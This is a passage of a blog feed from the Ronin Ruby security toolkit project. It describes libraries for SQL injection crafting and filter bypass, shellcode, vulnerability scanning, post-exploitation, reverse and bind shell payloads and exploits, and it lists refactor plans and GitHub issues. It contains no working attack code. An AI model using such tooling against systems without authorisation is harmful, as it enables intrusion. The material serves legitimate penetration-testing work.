<p><a href="https://github.com/ronin-rb/ronin-web-server">GitHub</a> | <a href="https://github.com/ronin-rb/ronin-web-server#readme">README</a> | <a href="https://github.com/ronin-rb/ronin-web-server#examples">Examples</a> | <a href="https://github.com/ronin-rb/ronin-web-server/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin-web-server/discussions">Forum</a> | <a href="/docs/ronin-web-server/">Documentation</a></p>
<h3 id="ronin-web-spider">ronin-web-spider</h3>
<p><a href="https://github.com/ronin-rb/ronin-web-spider#readme">ronin-web-spider</a> is a small library that builds on top of the battle tested
<a href="https://github.com/postmodern/spidr#readme">spidr</a> library. It provides additional callback methods that are relevant to
recon, such as <code class="language-plaintext highlighter-rouge">every_host</code>, <code class="language-plaintext highlighter-rouge">every_cert</code>, <code class="language-plaintext highlighter-rouge">every_favicon</code>, <code class="language-plaintext highlighter-rouge">every_javascript</code>,
<code class="language-plaintext highlighter-rouge">every_javascript_string</code>, <code class="language-plaintext highlighter-rouge">every_javascript_comment</code>, <code class="language-plaintext highlighter-rouge">every_html_comment</code>,
and <code class="language-plaintext highlighter-rouge">every_comment</code>.</p>
<p><a href="https://github.com/ronin-rb/ronin-web-spider">GitHub</a> | <a href="https://github.com/ronin-rb/ronin-web-spider#readme">README</a> | <a href="https://github.com/ronin-rb/ronin-web-spider#examples">Examples</a> | <a href="https://github.com/ronin-rb/ronin-web-spider/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin-web-spider/discussions">Forum</a> | <a href="/docs/ronin-web-spider/">Documentation</a></p>
<h3 id="ronin-web-user_agents">ronin-web-user_agents</h3>
<p><a href="https://github.com/ronin-rb/ronin-web-user_agents#readme">ronin-web-user_agents</a> is a small library for generating random but realistic
looking <code class="language-plaintext highlighter-rouge">User-Agent</code> strings for a variety of web browsers, OSes, devices, etc.</p>
<p><a href="https://github.com/ronin-rb/ronin-web-user_agents">GitHub</a> | <a href="https://github.com/ronin-rb/ronin-web-user_agents#readme">README</a> | <a href="https://github.com/ronin-rb/ronin-web-user_agents#examples">Examples</a> | <a href="https://github.com/ronin-rb/ronin-web-user_agents/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin-web-user_agents/discussions">Forum</a> | <a href="/docs/ronin-web-user_agents/">Documentation</a></p>
<h3 id="ronin-web">ronin-web</h3>
<p><a href="https://github.com/ronin-rb/ronin-web#readme">ronin-web</a> brings together all of the other <code class="language-plaintext highlighter-rouge">ronin-web-</code> libraries and provides
the <a href="https://github.com/ronin-rb/ronin-web#synopsis"><code class="language-plaintext highlighter-rouge">ronin-web</code> command</a> which provides numerous handy
web related commands, such as <code class="language-plaintext highlighter-rouge">diff</code>, <code class="language-plaintext highlighter-rouge">html</code>, <code class="language-plaintext highlighter-rouge">reverse-proxy</code>, <code class="language-plaintext highlighter-rouge">server</code>, and
<code class="language-plaintext highlighter-rouge">spider</code>.</p>
<p><a href="https://github.com/ronin-rb/ronin-web">GitHub</a> | <a href="https://github.com/ronin-rb/ronin-web#readme">README</a> | <a href="https://github.com/ronin-rb/ronin-web#synopsis">Synopsis</a> | <a href="https://github.com/ronin-rb/ronin-web#examples">Examples</a> | <a href="https://github.com/ronin-rb/ronin-web/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin-web/discussions">Forum</a> | <a href="/docs/ronin-web/">Documentation</a></p>
<h3 id="ronin-code-asm">ronin-code-asm</h3>
<p><a href="https://github.com/ronin-rb/ronin-code-asm#readme">ronin-code-asm</a> is a Ruby DSL for writing assembly in pure-Ruby.
<a href="https://github.com/ronin-rb/ronin-code-asm#readme">ronin-code-asm</a> can assemble full program or be used to write shellcode.</p>
<p><a href="https://github.com/ronin-rb/ronin-code-asm">GitHub</a> | <a href="https://github.com/ronin-rb/ronin-code-asm#readme">README</a> | <a href="https://github.com/ronin-rb/ronin-code-asm#examples">Examples</a> | <a href="https://github.com/ronin-rb/ronin-code-asm/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin-code-asm/discussions">Forum</a> | <a href="/docs/ronin-code-asm/">Documentation</a></p>
<h3 id="ronin-code-sql">ronin-code-sql</h3>
<p><a href="https://github.com/ronin-rb/ronin-code-sql#readme">ronin-code-sql</a> is a Ruby DSL for crafting SQL injections. It can also generate
obfuscated SQL for bypassing filters.</p>
<p><a href="https://github.com/ronin-rb/ronin-code-sql">GitHub</a> | <a href="https://github.com/ronin-rb/ronin-code-sql#readme">README</a> | <a href="https://github.com/ronin-rb/ronin-code-sql#examples">Examples</a> | <a href="https://github.com/ronin-rb/ronin-code-sql/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin-code-sql/discussions">Forum</a> | <a href="/docs/ronin-code-sql/">Documentation</a></p>
<h3 id="ronin-vulns">ronin-vulns</h3>
<p><a href="https://github.com/ronin-rb/ronin-vulns#readme">ronin-vulns</a> is a Ruby library for blind vulnerability testing. It can test for
Local File Inclusion (LFI), Remote File Inclusion (RFI), SQL injection (SQLi),
reflective Cross Site Scripting (XSS), Server Side Template Injection (SSTI),
and Open Redirects.</p>
<p><a href="https://github.com/ronin-rb/ronin-vulns">GitHub</a> | <a href="https://github.com/ronin-rb/ronin-vulns#readme">README</a> | <a href="https://github.com/ronin-rb/ronin-vulns#synopsis">Synopsis</a> | <a href="https://github.com/ronin-rb/ronin-vulns#examples">Examples</a> | <a href="https://github.com/ronin-rb/ronin-vulns/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin-vulns/discussions">Forum</a> | <a href="/docs/ronin-vulns/">Documentation</a></p>
<h3 id="ronin-post_ex">ronin-post_ex</h3>
<p><a href="https://github.com/ronin-rb/ronin-post_ex#readme">ronin-post_ex</a> provides a Post-Exploitation API for <a href="https://github.com/ronin-rb/ronin-post_ex#examples">interacting with
compromised systems</a>. <a href="https://github.com/ronin-rb/ronin-post_ex#readme">ronin-post_ex</a> is used by both
<a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a> and <a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a>.</p>
<p><a href="https://github.com/ronin-rb/ronin-post_ex">GitHub</a> | <a href="https://github.com/ronin-rb/ronin-post_ex#readme">README</a> | <a href="https://github.com/ronin-rb/ronin-post_ex#examples">Examples</a> | <a href="https://github.com/ronin-rb/ronin-post_ex/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin-post_ex/discussions">Forum</a> | <a href="/docs/ronin-post_ex/">Documentation</a></p>
<h3 id="ronin-payloads">ronin-payloads</h3>
<p><a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a> is a Ruby micro-framework for writing exploit payloads as plain
old Ruby classes. <a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a> comes with common payloads (ex: <code class="language-plaintext highlighter-rouge">exec_shell</code>,
<code class="language-plaintext highlighter-rouge">bind_shell</code>, <code class="language-plaintext highlighter-rouge">reverse_shell</code>) and can also load 3rd party payloads from
<a href="https://github.com/ronin-rb/ronin-repos#readme">ronin-repos</a>.</p>
<p><a href="https://github.com/ronin-rb/ronin-payloads">GitHub</a> | <a href="https://github.com/ronin-rb/ronin-payloads#readme">README</a> | <a href="https://github.com/ronin-rb/ronin-payloads#synopsis">Synopsis</a> | <a href="https://github.com/ronin-rb/ronin-payloads#examples">Examples</a> | <a href="https://github.com/ronin-rb/ronin-payloads/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin-payloads/discussions">Forum</a> | <a href="/docs/ronin-payloads/">Documentation</a></p>
<h3 id="ronin-exploits">ronin-exploits</h3>
<p><a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> is a Ruby micro-framework for writing and running exploits.
<a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> allows one to write exploits as plain old Ruby classes.
<a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> can load and run 3rd party exploits from either Ruby files or
from <a href="https://github.com/ronin-rb/ronin-repos#readme">ronin-repos</a>.</p>
<p><a href="https://github.com/ronin-rb/ronin-exploits">GitHub</a> | <a href="https://github.com/ronin-rb/ronin-exploits#readme">README</a> | <a href="https://github.com/ronin-rb/ronin-exploits#synopsis">Synopsis</a> | <a href="https://github.com/ronin-rb/ronin-exploits#examples">Examples</a> | <a href="https://github.com/ronin-rb/ronin-exploits/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin-exploits/discussions">Forum</a> | <a href="/docs/ronin-exploits/">Documentation</a></p>
<h3 id="ronin-fuzzer">ronin-fuzzer</h3>
<p><a href="https://github.com/ronin-rb/ronin-fuzzer#readme">ronin-fuzzer</a> is a Ruby library and CLI for generating, mutating, and fuzzing
data. The goal of <a href="https://github.com/ronin-rb/ronin-fuzzer#readme">ronin-fuzzer</a> is to be as configurable as possible.</p>
<p><a href="https://github.com/ronin-rb/ronin-fuzzer">GitHub</a> | <a href="https://github.com/ronin-rb/ronin-fuzzer#readme">README</a> | <a href="https://github.com/ronin-rb/ronin-fuzzer#synopsis">Synopsis</a> | <a href="https://github.com/ronin-rb/ronin-fuzzer#examples">Examples</a> | <a href="https://github.com/ronin-rb/ronin-fuzzer/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin-fuzzer/discussions">Forum</a> | <a href="/docs/ronin-fuzzer/">Documentation</a></p>
<h2 id="beta-testers-wanted">Beta Testers Wanted!</h2>
<p>Please consider testing Ronin 2.0.0 (beta) as any feedback helps improve
the final release. Even just reviewing the <code class="language-plaintext highlighter-rouge">README</code> files on GitHub or the <a href="/docs/">API
documentation</a> helps. Nearly a year of non-stop development and 4153
commits have gone into Ronin 2.0.0 (beta) and the other <code class="language-plaintext highlighter-rouge">ronin-</code> libraries,
but now we need actual users to test drive it.</p>
The Big Refactor is DONE!2022-12-30 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2022/12/30/the-big-refactor-is-done.html<p>After nearly a full year of non-stop development since the initial
<a href="/blog/2022/01/29/announcing-the-big-refactor.html">announcement of The Big Refactor</a>, 4153 commits and
<a href="https://github.com/orgs/ronin-rb/projects/2">700 closed issues</a> later, The Big Refactor is <em>finally</em> DONE!</p>
<p>Here is what happens next:</p>
<ol>
<li>All development branches will be merged into the <code class="language-plaintext highlighter-rouge">main</code> branch.</li>
<li>Pre-release versions will be tagged and released for all Ronin repositories.</li>
<li>Beta testing of the pre-release versions will begin. A blog post with
instructions on how to install the beta versions and participate in the beta
testing will also be published.</li>
<li>Subsequent pre-release or release candidate versions may be released based
on beta testing feedback.</li>
<li>Once all issues that have been spotted during beta testing have been fixed,
stable versions for all Ronin repositories will be released.</li>
</ol>
<p>Note that during beta testing, a feature freeze will be in effect.
Any new feature ideas or suggestions will be postponed/queued until the next
minor version release for that Ronin gem.</p>
Announcing The Big Refactor2022-01-29 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2022/01/29/announcing-the-big-refactor.html<p>After letting Ronin sit for sometime without adding new features or releasing
new versions, I decided it was time for a Big Refactor. There is still a lot of
useful features and code in Ronin, the code just needs to be brought up to date
and those features be better exposed to end-user. A refactor and re-organization
will also allow for the rapid development of newer ronin libraries and tools.</p>
<h2 id="high-level-plan">High-Level Plan</h2>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Bring repositories up to date with current Ruby best practices.
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Require ruby >= 2.7.0.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Set <code class="language-plaintext highlighter-rouge">.ruby-version</code> to <code class="language-plaintext highlighter-rouge">ruby-3.0</code> (WIP).</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Use keyword arguments (WIP).</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Rename all <code class="language-plaintext highlighter-rouge">extensions/</code> directories to <code class="language-plaintext highlighter-rouge">core_ext/</code> (WIP).</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Replace TravisCI with <a href="https://github.com/features/actions">GitHub Actions</a>.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Rename <code class="language-plaintext highlighter-rouge">master</code> branches to <code class="language-plaintext highlighter-rouge">main</code>.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Add a <code class="language-plaintext highlighter-rouge">CONTRIBUTING.md</code> file.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Setup <a href="https://github.com/rubocop/rubocop#readme">rubocop</a> style checker (pending).</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Opt-in to <a href="https://guides.rubygems.org/mfa-requirement-opt-in/">rubygems.org MFA requirement</a> (WIP).</li>
</ul>
</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Split larger libraries apart into smaller more manageable libraries.
<ul>
<li>Tier 1: ronin gems that only provide commands (ex: the main <a href="https://github.com/ronin-rb/ronin#readme">ronin</a> gem).</li>
<li>Tier 2: <code class="language-plaintext highlighter-rouge">ronin-*</code> gems that also contain commands and some library code
(ex: <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>).</li>
<li>Tier 3: <code class="language-plaintext highlighter-rouge">ronin-*</code> gems that only contain library code (ex:
<code class="language-plaintext highlighter-rouge">ronin-web-server</code>).</li>
</ul>
</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Change the licenses of all libraries from GPLv3 to LGPLv3; excluding
Tier 1 libraries.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Avoid excessive meta-programming in favor of simple Plain-Old-Ruby-Objects
(PORO).</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Add more commands to each <code class="language-plaintext highlighter-rouge">ronin-</code> library to better expose the APIs for
non-Ruby-programmers.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Standardize on using the <a href="https://github.com/postmodern/command_kit.rb#readme">command_kit</a> gem for all things CLI (WIP).</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Store all user data and configuration in <a href="https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html">XDG directories</a> (<code class="language-plaintext highlighter-rouge">~/.config/</code>,
<code class="language-plaintext highlighter-rouge">~/.cache/</code>, <code class="language-plaintext highlighter-rouge">~/.local/share/</code>) (WIP).</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Create a <a href="https://github.com/ronin-rb/ronin-core#readme">ronin-core</a> library for reusable internal library code.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Create a <a href="https://github.com/ronin-rb/ronin-repos#readme">ronin-repos</a> library for handling 3rd-party Git repositories of
additional code and data.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Extract database models from <a href="https://github.com/ronin-rb/ronin#readme">ronin</a> into <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>. Refactor to use
<a href="https://guides.rubyonrails.org/active_record_basics.html">ActiveRecord</a>.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Extract and refactor the <a href="https://github.com/ronin-rb/ronin-fuzzer#readme">ronin-fuzzer</a> library from <a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a>.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Extract and refactor <a href="https://github.com/ronin-rb/ronin-web-server#readme">ronin-web-server</a>, <a href="https://github.com/ronin-rb/ronin-web-spider#readme">ronin-web-spider</a>, and
<a href="https://github.com/ronin-rb/ronin-web-user_agents#readme">ronin-web-user_agents</a> libraries from <a href="https://github.com/ronin-rb/ronin-web#readme">ronin-web</a>.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Replace <a href="https://github.com/ronin-rb/ronin-php">ronin-php</a> with a new <a href="https://github.com/ronin-rb/ronin-vuln#readme">ronin-vuln</a> library.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Extract and refactor <a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a>, <a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-post_ex</a>,
<a href="https://github.com/ronin-rb/ronin-agent-node#readme">ronin-agent-node</a>, <a href="https://github.com/ronin-rb/ronin-agent-php#readme">ronin-agent-php</a>, and <a href="https://github.com/ronin-rb/ronin-agent-ruby#readme">ronin-agent-ruby</a>, libraries
from <a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a>.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Create a <a href="https://github.com/ronin-rb/ronin-c2#readme">ronin-c2</a> library for communicating with various agents and
payloads.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Deprecate the <code class="language-plaintext highlighter-rouge">ronin-gen</code> gem and command, in favor of adding a <code class="language-plaintext highlighter-rouge">gen</code> or
<code class="language-plaintext highlighter-rouge">new</code> subcommand for generating new boilerplate files or directories.</li>
</ul>
<h2 id="libraries">Libraries</h2>
<ul>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-support">ronin-support</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-core">ronin-core</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-repos">ronin-repos</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-db">ronin-db</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-code-asm">ronin-code-asm</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-code-sql">ronin-code-sql</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-web-server">ronin-web-server</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-web-spider">ronin-web-spider</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-web-user_agents">ronin-web-user_agents</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-web">ronin-web</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-fuzzer">ronin-fuzzer</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-post_ex">ronin-post_ex</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-c2">ronin-c2</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-agent-node">ronin-agent-node</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-agent-php">ronin-agent-php</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-agent-ruby">ronin-agent-ruby</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-payloads">ronin-payloads</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin-exploits">ronin-exploits</a></li>
<li><a href="/blog/2022/01/29/announcing-the-big-refactor.html#ronin">ronin</a></li>
</ul>
<p>Below are the links to the individual GitHub issues for each library. You will
notice that nearly half of the issues are already checked. That is because they
have already been completed prior to publishing this blog post. We are already
past the half-way mark!</p>
<p>If you want to see what is currently being worked on, checkout the
<a href="https://github.com/orgs/ronin-rb/projects/2">GitHub Project Board</a>.</p>
<p>If you see any issues that interest you, feel free to comment on the issue
or join our <a href="https://discord.gg/6WAb3PsVX9">Discord</a> server.</p>
<h3 id="ronin-support"><a href="https://github.com/ronin-rb/ronin-support/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-support</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a> is a support library for ronin-rb. ronin-support provides
many Core Extensions to Ruby’s built-in classes as well as it’s own
Classes/Modules. ronin-support can be used by other Ruby libraries, tools, or
scripts.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-support/tree/1.0.0">1.0.0</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/146">Add support for a RONIN_HTTP_PROXY env variable</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/138">Style the [ ] part as ANSI bold+bright in CLI::Printing#print_* methods</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/137">Remove ANSI coloring from the message in CLI::Printing#print_* methods?</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/136">Add an ANSI reset to the CLI::Printing#print_* methods</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/130">Add print_debug statements to Network methods</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/125">Add a Hash of built-in User-Agent strings</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/124">Allow the user_agent: keyword argument to accept a Symbol</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/123">Add a user_agent: :random option to Network::HTTP methods</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/121">Add Ronin::Support::Interactive</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/114">Remove data_paths dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/111">Add Ronin::IP value-object class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/110">Add Ronin::Host value-object class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/109">Add Ronin::Domain value-object class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/108">Add Ronin::Port value-object class?</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/107">Rename ronin/formatting to just ronin/format</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/105">Rename ronin/extensions/regexp to ronin/text/patterns</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/104">Add Ronin::IP::CIDR</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/103">Add a Ronin::IP::Glob class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/102">Refactor Ronin::Templates::Erb to Ronin::Text::ERB</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/101">Add support for Base32</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/100">Add support for Base64, with a custom table</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/99">Add Ronin::Text::Typo</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/98">Add bash shell command formatting methods to ronin/formatting</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/97">Add helper methods for converting between ASCII and UTF8</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/96">Add Ronin::Network::DNS::Resolver</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/95">Add dns_record(type, name) method to Ronin::Network::DNS</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/94">Add dns_mx(name), dns_cname(name), dns_txt(name), etc methods to Ronin::Network::DNS</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/93">Add a basic connect() port scanner method/class to Ronin::Network::TCP</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/92">Add a method for generating our own self-signed cert in Ronin::Network::SSL</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/91">Allow configuring the ssl_version in Ronin::Network::SSL</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/90">Add Ronin::Network::SSL::Server</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/89">Add Ronin::Network::TLS</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/87">Add Ronin::Network::HTTP::Client class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/86">Refactor http_* methods to accept a single String or URI argument</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/85">Allow http_* methods to support passing a block to receive each response chunk</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/84">Add methods for parsing .key, .pem, or .crt files to Ronin::Crypto</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/83">Add 3DES encryption method to Ronin::Crypto</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/82">Add AES encryption/decryption methods to Ronin::Crypto</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/81">Add RSA encryption/decryption methods to Ronin::Crypto</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/80">Add String#rot(n=13) as a joke to Ronin::Crypto</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/75">Add a Type system called Ronin::Binary::Types</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-support/issues/74">Add Ronin::Arch namespace</a></li>
</ul>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/145">Remove ronin/fuzzing.rb and ronin/fuzzing</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/144">Change HTTP :proxy options to accept a String</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/143">Upgrade to uri-query_params ~> 0.8</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/142">Upgrade to hexdump ~> 1.0</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/141">Remove ronin/extensions/meta and ronin/extensions/meta/object</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/140">Remove yard-parameters dependency</a></li>
